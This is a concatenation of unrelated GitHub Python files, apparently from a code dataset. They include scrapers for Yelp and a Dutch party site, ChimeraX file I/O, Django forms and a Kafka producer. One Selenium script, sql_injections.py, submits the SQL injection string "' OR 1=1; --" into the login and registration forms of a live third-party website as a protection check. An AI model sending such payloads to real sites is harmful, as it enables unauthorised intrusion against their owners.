re\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport aiohttp\r\nimport time\r\n\r\nheaders={\r\n 'User-Agent': \"Mozilla/5.0 (X11; CrOS x86_64 12871.102.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.141 Safari/537.36\"\r\n}\r\n\r\n\r\n\r\nasync def main(urls,startnum,ix):\r\n async with aiohttp.ClientSession(trust_env=True) as session:\r\n ret = await asyncio.gather(*[get(url,session,startnum+i,ix) for i,url in enumerate(urls)])\r\n print(\"Finalized all. Return is a list of len {} outputs.\".format(len(ret)))\r\n return ret\r\nasync def get(url, session,startnum,i):\r\n #print(url)\r\n try:\r\n async with session.get(url=url,headers=headers,timeout=12) as response:\r\n resp = await response.read()\r\n print(\"{}: Successfully got url {} with resp of length {}.\".format(startnum,url, len(resp)))\r\n if(resp is not None):\r\n #print(resp)\r\n try:\r\n soup = BeautifulSoup(resp,'lxml')\r\n data = soup.find_all('script',attrs={ \"data-hypernova-key\" :\"yelpfrontend__5460__yelpfrontend__GondolaSearch__dynamic\" })# attrs={ \"data-hypernova-key\" :\"yelpfrontend__54515__yelpfrontend__GondolaSearch__dynamic\" }\r\n datastr = data[0].getText()[4:-4]\r\n arridx=[m.start() for m in re.finditer('{\"ranking\":', datastr)]\r\n arridy=[m.start() for m in re.finditer(',\"scrollablePhotos\":', datastr)]\r\n loaded = []\r\n #print(datastr)\r\n for z in range(10):\r\n loaded.append(json.loads(datastr[arridx[z]:arridy[z]]))\r\n #print(json.loads(datastr[arridx[z]:arridy[z]]))\r\n\r\n if loaded[z]['website'] is not None:\r\n loaded[z]['website']=loaded[z]['website']['href']\r\n # print(loaded[z]['website'])\r\n df = pd.DataFrame(loaded)\r\n return df\r\n # df.to_csv(\"data.csv\",mode='a') \r\n except:\r\n i.write(url+'\\n')\r\n pass\r\n\r\n except Exception as e:\r\n try:\r\n print(\"{}: Unable to get url {} due to {}.\".format(startnum,url, e.__class__))\r\n i.write(url+'\\n')\r\n # errors.add(url)\r\n return None\r\n except:\r\n print(\"error\")\r\ndef chonk(arrdata,chonksize):\r\n chonk = []\r\n chonkytonk = []\r\n count = 0\r\n for x in arrdata:\r\n chonk.append(x)\r\n #print(x)\r\n if count>chonksize:\r\n count = 0\r\n chonkytonk.append(chonk)\r\n chonk = []\r\n count = count +1\r\n return chonkytonk\r\n\r\ndef y():\r\n\r\n # btype = [\"bakeries\",\"cafe\"]\r\n # baseurl = 'https://www.yelp.com/search?find_desc='\r\n # locurl = '&find_loc='\r\n # #https://www.yelp.com/search?find_desc=cafe&find_loc=toyko+japan\r\n # start_urls=[]\r\n # start_index = 0\r\n\r\n # for i in range(len(cities)):\r\n # for b in btype:\r\n # start_urls.append(baseurl+str(b)+str(locurl)+cities[i])\r\n # for c in range(1,24):\r\n # start_urls.append(baseurl+str(b)+str(locurl)+str(cities[i])+\"&start=\"+str(c*10))\r\n #start_urls = start_urls[0:4]\r\n\r\n # chonk = []\r\n # chonkytonk = []\r\n # chonksize = 10\r\n # count = 0\r\n # for x in start_urls:\r\n # chonk.append(x)\r\n # #print(x)\r\n # if count>chonksize:\r\n # count = 0\r\n # chonkytonk.append(chonk)\r\n # chonk = []\r\n # count = count +1\r\n startfile = 210\r\n endfile = 214\r\n startindex = 3185\r\n chonksize = 7\r\n for x in range(startfile,endfile):\r\n f = open(\"city-\"+str(x)+\".txt\",\"r\",encoding=\"utf-8\")\r\n start_urls = f.read().split(\"\\n\")\r\n f.close()\r\n start_urls = start_urls[startindex:]\r\n chonkytonk = chonk(start_urls,chonksize)\r\n #print(chonkytonk)\r\n for chunk in chonkytonk:\r\n # g = open(\"testing.txt\",\"a\",encoding='utf')\r\n # g.write('\\n'.join(chunk)+\"\\n\")\r\n # g.close()\r\n i = open(\"yelp_error.txt\",\"a\",encoding=\"utf-8\")\r\n df = asyncio.run(main(chunk,startindex,i))\r\n i.close()\r\n try:\r\n for y in df:\r\n print(x)\r\n y.to_csv(\"data-\"+str(x)+\".csv\",mode='a',header=None,index=False)\r\n except:\r\n pass\r\n time.sleep(4)\r\n del df\r\n # print(chunk)\r\n startindex = startindex+chonksize+1\r\n startindex = 0\r\n\r\ny()\r\n","repo_name":"holdings420/YelpScraper","sub_path":"yelp.py","file_name":"yelp.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70986747712","text":"class Node:\n \"\"\"링크드 리스트의 노드 클래스\"\"\"\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nhead = Node(0)\nnode_1 = Node(1)\nnode_2 = Node(2)\nnode_3 = Node(3)\nnode_4 = Node(4)\nnode_5 = Node(5)\n\nhead.next = node_1\nnode_1.next = node_2\nnode_2.next = node_3\nnode_3.next = node_4\nnode_4.next = node_5\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def append(self, node):\n if not self.head:\n self.head = node\n self.tail = node\n else:\n current_node = self.head\n while current_node.next:\n current_node = current_node.next\n current_node.next = node\n self.tail = node\n\n def find_node_at(self, index):\n if index == 0:\n return self.head\n else:\n node = self.head\n i = 0\n while i != index:\n node = node.next\n i += 1\n return node\n\n\n\n\n\n\n","repo_name":"Einsicht1/self-taught-developer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11400859010","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom faker import Faker\n\n\ndef auth_form_check():\n try:\n driver = webdriver.Chrome()\n driver.get(\"https://www.rerum.cz/prihlaseni\")\n\n # Cookie pop up\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]'))).click()\n wait = WebDriverWait(driver, 10)\n\n email_element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.NAME, 'login'))).send_keys(\"' OR 1=1; --\")\n password_element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'login_password'))).send_keys(\"' OR 1=1; --\")\n\n submit_button = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/main/div/div/div[1]/div[2]/form/input[3]')))\n submit_button.click()\n \n WebDriverWait(driver, 10).until(EC.alert_is_present())\n\n except Exception as e:\n print(f\"Test auth_form_check passed: SQL injection protection is effective {str(e)}\") \n\n finally:\n driver.quit() \n\nauth_form_check()\n\n\ndef registration_form_check_test1():\n try:\n driver = webdriver.Chrome()\n driver.get(\"https://www.rerum.cz/\")\n\n # Cookie pop up\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]'))).click()\n wait = WebDriverWait(driver, 10)\n\n \n form_button_locator = driver.find_element(by=By.ID, value='get-credit-frontpage')\n form_button_locator.click()\n\n # 1 registration page \n wait = WebDriverWait(driver, 10)\n driver.find_element(by=By.NAME, value='contract_accept').click()\n name_input = wait.until(EC.presence_of_element_located((By.NAME, 'realname')))\n surname_input = wait.until(EC.presence_of_element_located((By.NAME, 'surname')))\n email_input = wait.until(EC.presence_of_element_located((By.ID, 'email')))\n mob_phone_input = wait.until(EC.presence_of_element_located((By.ID, 'mob_phone')))\n submit_button = wait.until(EC.element_to_be_clickable((By.XPATH, '//input[@value=\"Pokračovat\"]')))\n\n name_input.send_keys(\"' OR 1=1; --\")\n surname_input.send_keys(\"' OR 1=1; --\")\n email_input.send_keys(\"' OR 1=1; --\")\n mob_phone_input.send_keys(\"' OR 1=1; --\")\n submit_button.click()\n \n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n print(\"ok\") \n finally:\n driver.quit()\n \n# registration_form_check_test1() \n","repo_name":"EkaterinaO19/selenium","sub_path":"sql_injections.py","file_name":"sql_injections.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74936598590","text":"# vim: set expandtab shiftwidth=4 softtabstop=4:\n\n\ndef open_xyz(session, stream):\n \"\"\"Read an XYZ file from a file-like object.\n\n Returns the 2-tuple return value expected by the\n \"open command\" manager's :py:meth:`run_provider` method.\n \"\"\"\n structures = []\n line_number = 0\n atoms = 0\n bonds = 0\n while True:\n s, line_number = _read_block(session, stream, line_number)\n if not s:\n break\n structures.append(s)\n atoms += s.num_atoms\n bonds += s.num_bonds\n status = (\"Opened XYZ file containing %d structures (%d atoms, %d bonds)\" %\n (len(structures), atoms, bonds))\n return structures, status\n\n\ndef _read_block(session, stream, line_number):\n # XYZ files are stored in blocks, with each block representing\n # a set of atoms. This function reads a single block\n # and builds a ChimeraX AtomStructure instance containing\n # the atoms listed in the block.\n\n # First line should be an integer count of the number of\n # atoms in the block.\n count_line = stream.readline()\n if not count_line:\n # Reached EOF, normal termination condition\n return None, line_number\n line_number += 1\n try:\n count = int(count_line)\n except ValueError:\n session.logger.error(\"line %d: atom count missing\" % line_number)\n return None, line_number\n\n # Create the AtomicStructure instance for atoms in this block.\n # All atoms in the structure are placed in one residue\n # since XYZ format does not partition atoms into groups.\n from chimerax.atomic import AtomicStructure\n from numpy import array, float64\n s = AtomicStructure(session)\n residue = s.new_residue(\"UNK\", 'A', 1)\n\n # XYZ format supplies the atom element type only, but\n # ChimeraX keeps track of both the element type and\n # a unique name for each atom. To construct the unique\n # atom name, the # 'element_count' dictionary is used\n # to track the number of atoms of each element type so far,\n # and the current count is used to build unique atom names.\n element_count = {}\n\n # Next line is a comment line\n s.comment = stream.readline().strip()\n line_number += 1\n\n # There should be \"count\" lines of atoms.\n for n in range(count):\n atom_line = stream.readline()\n if not atom_line:\n session.logger.error(\"line %d: atom data missing\" % line_number)\n return None, line_number\n line_number += 1\n\n # Extract available data\n parts = atom_line.split()\n if len(parts) != 4:\n session.logger.error(\"line %d: atom data malformatted\"\n % line_number)\n return None, line_number\n\n # Convert to required parameters for creating atom.\n # Since XYZ format only required atom element, we\n # create a unique atom name by putting a number after\n # the element name.\n xyz = [float(v) for v in parts[1:]]\n element = parts[0]\n n = element_count.get(element, 0) + 1\n name = element + str(n)\n element_count[element] = n\n\n # Create atom in AtomicStructure instance 's',\n # set its coordinates, and add to residue\n atom = s.new_atom(name, element)\n atom.coord = array(xyz, dtype=float64)\n residue.add_atom(atom)\n\n # Use AtomicStructure method to add bonds based on interatomic distances\n s.connect_structure()\n\n # Updating state such as atom types while adding atoms iteratively\n # is unnecessary (and generally incorrect for partial structures).\n # When all atoms have been added, the instance is notified to\n # tell it to update internal state.\n s.new_atoms()\n\n # Return AtomicStructure instance and current line number\n return s, line_number\n\n\ndef save_xyz(session, path, structures=None):\n \"\"\"Write an XYZ file from given models, or all models if None.\n \"\"\"\n # Open path with proper encoding; 'open_output' automatically\n # handles compression if the file name also has a compression\n # suffix (e.g. .gz)\n from chimerax.io import open_output\n f = open_output(path, session.data_formats['XYZ'].encoding)\n\n # If no models were given, use all atomic structures\n if structures is None:\n from chimerax.atomic import AtomicStructure\n structures = session.models.list(type=AtomicStructure)\n num_atoms = 0\n\n # Loop through structures and print atoms\n for s in structures:\n # We get the list of atoms and transformed atomic coordinates\n # as arrays so that we can limit the number of accesses to\n # molecular data, which is slower than accessing arrays directly\n atoms = s.atoms\n coords = atoms.scene_coords\n\n # First line for a structure is the number of atoms\n print(str(s.num_atoms), file=f)\n # Second line is a comment\n print(getattr(s, \"name\", \"unnamed\"), file=f)\n # One line per atom thereafter\n for i in range(len(atoms)):\n a = atoms[i]\n c = coords[i]\n print(\"%s %.3f %.3f %.3f\" % (a.element, c[0], c[1], c[2]), file=f)\n num_atoms += s.num_atoms\n f.close()\n\n # Notify user that file was saved\n session.logger.status(\"Saved XYZ file containing %d structures (%d atoms)\"\n % (len(structures), num_atoms))\n # No return value\n","repo_name":"RBVI/ChimeraX","sub_path":"src/examples/tutorials/tut_save/src/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"60"} +{"seq_id":"6608672499","text":"from django import forms\nfrom .models import UserProfile\nfrom django.conf import settings\n\nclass UserProfileForm(forms.ModelForm):\n select_classes = [\n ('class i', 'Class I'),\n ('class ii', 'Class II'),\n ('class iii', 'Class III'),\n ('class iv', 'Class IV'),\n ('class v', 'Class V'),\n ('class vi', 'Class VI'),\n ('class vii', 'Class VII'),\n ('class viii', 'Class VIII'),\n ('class ix', 'Class IX'),\n ('class x', 'Class X'),\n ('class xi', 'Class XI'),\n ('class xii', 'Class XII'),\n ]\n \n select_class = forms.ChoiceField(choices=select_classes, required=False)\n\n class Meta:\n model = UserProfile\n fields = [\n 'full_name',\n 'email',\n 'profile_image',\n 'address',\n 'phone_number',\n 'mode',\n 'skills',\n 'subjects',\n 'password',\n 'role',\n ]\n \n def clean_profile_image(self):\n profile_image = self.cleaned_data.get('profile_image')\n if profile_image:\n if profile_image.size > settings.MAX_UPLOAD_SIZE:\n raise forms.ValidationError(\"File size is too large. Maximum allowed size is 5MB.\")\n return profile_image\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image.\")\n","repo_name":"younikingneerajgupta/lifemastryconnect.com","sub_path":"UserRegistrationForm/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8132033038","text":"from django.urls import path\n\nfrom profile_module import views\n\nurlpatterns = [\n path('', views.Profile.as_view(), name='tabpane_profile'),\n\n path('update/status', views.set_status, name='set_status'),\n path('update/personal-form', views.PersonalInfo.as_view(), name='personal_form'),\n path('update', views.Settings.as_view(), name='tabpane_settings'),\n path('update/avatar', views.save_avatar, name='save_avatar'),\n]\n","repo_name":"MHMK2002/chat_box","sub_path":"profile_module/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29554407396","text":"# -*- coding: utf-8 -*-\n\nfrom utils import converter as cvt\nimport numpy as np\nimport sys\nimport argparse\n\nCONFIG_PATH = \"../config/atomMap.txt\"\nDB_PATH = \"../demoDB/smiles\"\nWORK_DIR = \"../out/work\"\nOUT_DIR = \"../out/svg\"\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"convert smiles format 2 adjancy matrix\")\n parser.add_argument('id', help=\"data id for demo\")\n\n args = parser.parse_args()\n data_id = args.id\n Converter = cvt.Converter(CONFIG_PATH)\n data_path = DB_PATH + \"/\" + data_id + \".txt\"\n try:\n Converter.read(data_path)\n print(\"reader done\")\n except Exception as e:\n print(e)\n sys.exit()\n\n A, v = Converter.mol2adjancy()\n\n id_label_dict = {int(k): int(v) for (k, v) in v}\n try:\n dfs_v, dfs_e = Converter.adjancy2dfs(A, id_label_dict)\n except Exception as e:\n print(e)\n sys.exit()\n\n # convert DFS2Mol\n Converter.graphSVG(OUT_DIR + \"/test.svg\",\n Converter.dfs2Molbolck(dfs_v, dfs_e, WORK_DIR))\n","repo_name":"se-z/Chemo-Graph-Convert-utils","sub_path":"src/test_5_mol2svg.py","file_name":"test_5_mol2svg.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"789255621","text":"#!/usr/bin/python3\n\nimport skimage.io\nimport os\n\nShapes = set()\nfor f in os.listdir('Images'):\n img = skimage.io.imread(os.path.join('Images', f))\n Shapes.add((img.shape[0], img.shape[1]))\n\nprint(Shapes)\n","repo_name":"ajfabian/Affective-Computing","sub_path":"find_min_rect.py","file_name":"find_min_rect.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2079091788","text":"def not_hesapla(satır):\n\n satır=satır[:-1] # satırlar arasında ki boşluğu ortadan kaldırıyor\n liste = satır.split(\",\") #herbir elemanı virgüle göre parçala ve her satırı listeye at\n\n #bir satır içindeki verileri parça parça değişkenlerde tuttuk\n isim = liste[0]\n not1 = int(liste[1])\n not2 = int(liste[2])\n not3 = int(liste[3])\n\n son_not = not1 * (3/10) + not2 * (3/10) + not3 * (4/10)\n\n\n if (son_not>=90):\n harf = \"AA\"\n\n elif (son_not>=85):\n harf = \"BA\"\n\n elif (son_not>=80):\n harf = \"BB\"\n\n elif (son_not>=75):\n harf = \"CB\"\n\n elif (son_not>=70):\n harf = \"CC\"\n\n elif (son_not>=65):\n harf = \"DC\"\n\n elif (son_not>=60):\n harf = \"DD\"\n\n elif (son_not>=55):\n harf = \"FD\"\n\n else:\n harf = \"FF\"\n\n return isim +\"=\" + harf + \"\\n\"\n\n\n\n\nwith open(\"sinif.txt\",\"r\",encoding=\"utf-8\") as file:\n\n eklenecekler_listesi=[]\n geçenler_listesi=[]\n kalanlar_listesi=[]\n for i in file:\n eklenecekler_listesi.append(not_hesapla(i))\n\n print(eklenecekler_listesi)\n\n for i in eklenecekler_listesi:\n i = i[:-1]\n liste = i.split(\"=\")\n \n isim=liste[0]\n harf=liste[1]\n\n if (harf == \"FF\"):\n kalanlar_listesi.append(i)\n else:\n geçenler_listesi.append(i)\n\n\n with open (\"notlar.txt\",\"w\",encoding=\"utf-8\") as file2:\n for i in eklenecekler_listesi:\n file2.write(i)\n\n\n with open (\"gecenler.txt\",\"w\",encoding=\"utf-8\") as geçen:\n for i in geçenler_listesi:\n geçen.write(i)\n geçen.write(\"\\n\")\n\n with open (\"kalanlar.txt\",\"w\",encoding=\"utf-8\") as kalan:\n for i in kalanlar_listesi:\n kalan.write(i)\n kalan.write(\"\\n\")\n","repo_name":"BusraOzer/PythonExercises","sub_path":"9FileOperations/SinifinHarfNotunuHesaplama.py","file_name":"SinifinHarfNotunuHesaplama.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37746361238","text":"import datetime\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom lxml import html\n\n# Make sure to use Dutch date formats\nimport locale\nlocale.setlocale(locale.LC_TIME, \"nl_NL.utf8\")\n\nURL_TEMPLATE = \"https://www.pvda.nl/nieuws/page/{page}\"\nURL_ROOT = \"https://www.pvda.nl/nieuws\"\n\ndef get_css(tree, selection, text=True, error=True):\n res = tree.cssselect(selection)\n if len(res) != 1:\n if not error:\n return None\n # raise ValueError(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n raise Warning(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n return res[0]\n \ndef scrape_pb(url, date, headline):\n print(url)\n page = requests.get(url)\n tree = html.fromstring(page.text)\n lead = tree.cssselect(\"div.siteorigin-widget-tinymce.textwidget\")\n lead = lead[0].text_content()\n author = tree.cssselect(\"div.related-excerpt h2\")\n if not author:\n author =\"PvdA\"\n else:\n author = author[0].text_content().strip()\n quotes = tree.cssselect(\"div.content blockquote\")\n quote = []\n for q in quotes:\n q2 = q.text_content()\n quote.append(q2)\n quote = \"\\n\\n\".join(quote)\n content = tree.cssselect(\"div.content\")\n body2=[]\n for cont in content:\n text = cont.text_content()\n body2.append(text)\n body2 = \"\\n\\n\".join(body2)\n return {\"headline\": headline,\n \"lead\": lead,\n \"text\": body2,\n \"author\": author,\n \"date\": date,\n \"medium\": \"PvdA site\",\n \"quotes\": quote,\n \"url\": url}\n\ndef get_links():\n for page in range(1, 823):\n url = URL_TEMPLATE.format(**locals())\n print(url)\n page = requests.get(url)\n open(\"/tmp/test.html\",\"w\").write(page.text)\n tree = html.fromstring(page.text)\n posts = tree.cssselect(\".partial-post\")\n for post in posts:\n # is hetzelfde als de title,= notatie\n #titles = post.cssselect(\"h2\")\n #if len(titles) != 1:\n # raise Exception(\"Boe\")\n #title = titles[0]\n link, = post.cssselect(\"h2 > a\")\n href = link.get(\"href\")\n if not href.startswith(\"https://www.pvda.nl/nieuws/\"):\n continue\n else:\n headline = link.text_content().strip()\n meta, = post.cssselect(\"span.meta\")\n datestr = meta.text_content()\n m = re.match(r\"(\\d+ \\w+ \\d{4})\", datestr.strip())\n if not m:\n raise ValueError(f\"Cannot prase date: {datestr}\")\n datestr2 = m.group(1)\n date = datetime.strptime(datestr2, \"%d %B %Y\")\n yield date, headline, href\n\n#a = scrape_pb(\"/actueel/nieuws/2019/03/04/reactie-minister-blok-op-het-terugroepen-van-de-nederlandse-ambassadeur-uit-iran\")\n#print(a)\n#sys.exit()\nfrom amcatclient import AmcatAPI\nconn = AmcatAPI(\"https://amcat.nl\")\nfor date, headline, href in get_links():\n a = scrape_pb(href, date, headline)\n conn.create_articles(2051, 80339, [a])\n \n","repo_name":"nruigrok/fbpostscraper","sub_path":"pvda.py","file_name":"pvda.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74700798271","text":"homemvelho= ' '\nmulheres = 0\nidadeh = 0\nfor ps in range (1,9):\n nome = str(input('Digite seu nome: '))\n idade = int(input('Digite a sua idade: '))\n sexo = str(input('Digite seu sexo: '))\n if sexo == \"homem\" and idade > idadeh:\n homemvelho = nome\n if sexo == \"mulher\" and idade < 20:\n mulheres +=1\n\nprint(\"O homem mais velho é: \", homemvelho)\nprint('A mulheres menores de 20 anos : ', mulheres)","repo_name":"LoremrsSousa/python.02","sub_path":"ExRepetFOR/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15952556963","text":"import csv\nimport random\nfrom datetime import datetime\nimport pytz\nfrom threading import Timer\nfrom confluent_kafka import Producer\nimport logging\n\n# from snakebite.client import Client\n\n# HADOOP_HOST = \"localhost\"\n# # HADOOP_HOST='namenode'\n# client = Client(HADOOP_HOST, 9000)\n\n# for p in client.mkdir([\"/demo/demo1\", \"/demo2\"], create_parent=True):\n# print(\"p\", p)\n\n\nHOST = \"broker:29092\"\n# HOST = \"localhost:9092\"\nlogging.basicConfig(\n format=\"%(asctime)s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n filename=\"producer.log\",\n filemode=\"w\",\n)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef receipt(err, msg):\n if err is not None:\n print(\"Error: {}\".format(err))\n else:\n message = \"Produced message on topic {} with value of {}\\n\".format(\n msg.topic(), msg.value().decode(\"utf-8\")\n )\n logger.info(message)\n print(message)\n\n\nmachines = [\n {\"machine_id\": 1, \"product_name\": \"peugeot 208\", \"product_category\": \"vehicule\"},\n # {\"machine_id\": 2, \"product_name\": \"clio 4\", \"product_category\": \"vehicule\"},\n]\nperiod = 5\nfields = [\n \"product_name\",\n \"product_category\",\n \"dateHour\",\n \"gpsSpeed\",\n \"gpsSatCount\",\n \"Gear\",\n \"Brake_pedal\",\n \"Accel_pedal\",\n \"Machine_Speed_Mesured\",\n \"AST_Direction\",\n \"Ast_HPMB1_Pressure_bar\",\n \"Ast_HPMA_Pressure_bar\",\n \"Pressure_HighPressureReturn\",\n \"Pressure_HighPressure\",\n \"Oil_Temperature\",\n \"Ast_FrontAxleSpeed_Rpm\",\n \"Pump_Speed\",\n]\n\n\ndef gen_csv():\n Timer(period, gen_csv).start()\n now = datetime.now()\n\n # second = str(now.second)\n minute = str(now.minute)\n hour = str(now.hour)\n\n day = str(now.day)\n month = str(now.month)\n year = str(now.year)\n date_time = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n machine = random.choice(machines)\n\n machine_id = str(machine[\"machine_id\"])\n product_name = machine[\"product_name\"]\n product_category = machine[\"product_category\"]\n print(\"machine_id\", machine_id)\n print(\"product_name\", product_name)\n print(\"product_category\", product_category)\n rows = [\n [\n product_name,\n product_category,\n date_time\n + \":0.\"\n + str(datetime.now().microsecond), # \"2018-01-19 05:37:0.612611\",\n random.uniform(5, 8.62), # 8.62,\n random.randint(50, 94), # 94,\n random.randint(0, 131), # 131,\n random.randint(0, 131), # 131,\n random.randint(0, 1), # 0,\n random.randint(10, 20), # 20,\n random.randint(10, 20), # 20,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(12345, 32826), # 32826,\n random.randint(38, 58), # 58,\n random.randint(12345, 32826), # 32826,\n random.randint(128, 894), # 894,\n ],\n [\n product_name,\n product_category,\n date_time\n + \":0.\"\n + str(datetime.now().microsecond), # \"2018-01-19 05:37:0.612611\",\n random.uniform(5, 8.62), # 8.62,\n random.randint(50, 94), # 94,\n random.randint(0, 131), # 131,\n random.randint(0, 131), # 131,\n random.randint(0, 1), # 0,\n random.randint(10, 20), # 20,\n random.randint(10, 20), # 20,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(12345, 32826), # 32826,\n random.randint(38, 58), # 58,\n random.randint(12345, 32826), # 32826,\n random.randint(128, 894), # 894,\n ],\n ]\n\n newYorkTz = pytz.timezone(\"Europe/Paris\")\n timeInNewYork = str(datetime.now(newYorkTz))\n\n # name of csv file\n csv_file = \"X467\" + machine_id + \"_\" + timeInNewYork + \".csv\"\n filename = \"./csv_data/\" + csv_file\n\n # writing to csv file\n with open(filename, \"w\") as csvfile:\n # creating a csv writer object\n try:\n csvwriter = csv.writer(csvfile, delimiter=\";\")\n\n # writing the fields\n csvwriter.writerow(fields)\n\n # writing the data rows\n csvwriter.writerows(rows)\n # client.copyFromLocal(csv_file, \"/csv_data/\" + csv_file)\n TOPIC_NAME = \"new_csv_kafka_topic\"\n p = Producer({\"bootstrap.servers\": HOST})\n\n p.produce(TOPIC_NAME, csv_file, callback=receipt)\n p.flush()\n except Exception as e:\n print(\"error\", e)\n # logger.log(e).debug()\n finally:\n # if os.path.exists(filename):\n # os.remove(filename)\n # print(\"file removed\", filename)\n print(\"ok finally\")\n\n\ngen_csv()\n","repo_name":"hoochycoochie/iot_jems","sub_path":"producer/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17760597424","text":"import cv2\nimport time\nimport matplotlib.image as mpimg\nimport numpy as np\nfrom skimage.feature import hog\nimport matplotlib.pyplot as plt\nimport glob\n\nhog_extractor_global = None\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\n\n\n# Define a function to compute binned color features\ndef bin_spatial(img, size=(32, 32)):\n features = cv2.resize(img, size).ravel()\n return features\n\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):\n # Call with two outputs if visualize is True\n if vis:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n transform_sqrt=True, visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else:\n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n transform_sqrt=True, visualise=vis, feature_vector=feature_vec)\n return features\n\n\n# Define a function to compute color histogram features\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:, :, 0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:, :, 1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:, :, 2], bins=nbins, range=bins_range)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n\ndef extract_features(imgs, cspace='RGB', spatial_size=(32, 32), hist_bins=32, hist_range=(0, 256), orient=9,\n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n extract_spatial_features=True, extract_hist_features=True, extract_hog_features=True):\n # Create a list to append feature vectors to\n features = []\n\n # hog_extract_manager = None\n\n # Iterate through the list of images\n for file in imgs:\n\n file_features = []\n\n # Read in each one by one\n img = mpimg.imread(file)\n\n img = (img * 255).astype(np.uint8)\n\n # apply color conversion if other than 'RGB'\n if cspace != 'RGB':\n if cspace == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif cspace == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif cspace == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif cspace == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif cspace == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else:\n feature_image = np.copy(img)\n\n if extract_spatial_features:\n # Apply bin_spatial() to get spatial color features\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n file_features.append(spatial_features)\n\n if extract_hist_features:\n # Apply color_hist() also with a color space option now\n hist_features = color_hist(feature_image, nbins=hist_bins, bins_range=hist_range)\n file_features.append(hist_features)\n\n if extract_hog_features:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:, :, channel],\n orient, pix_per_cell, cell_per_block,\n vis=False, 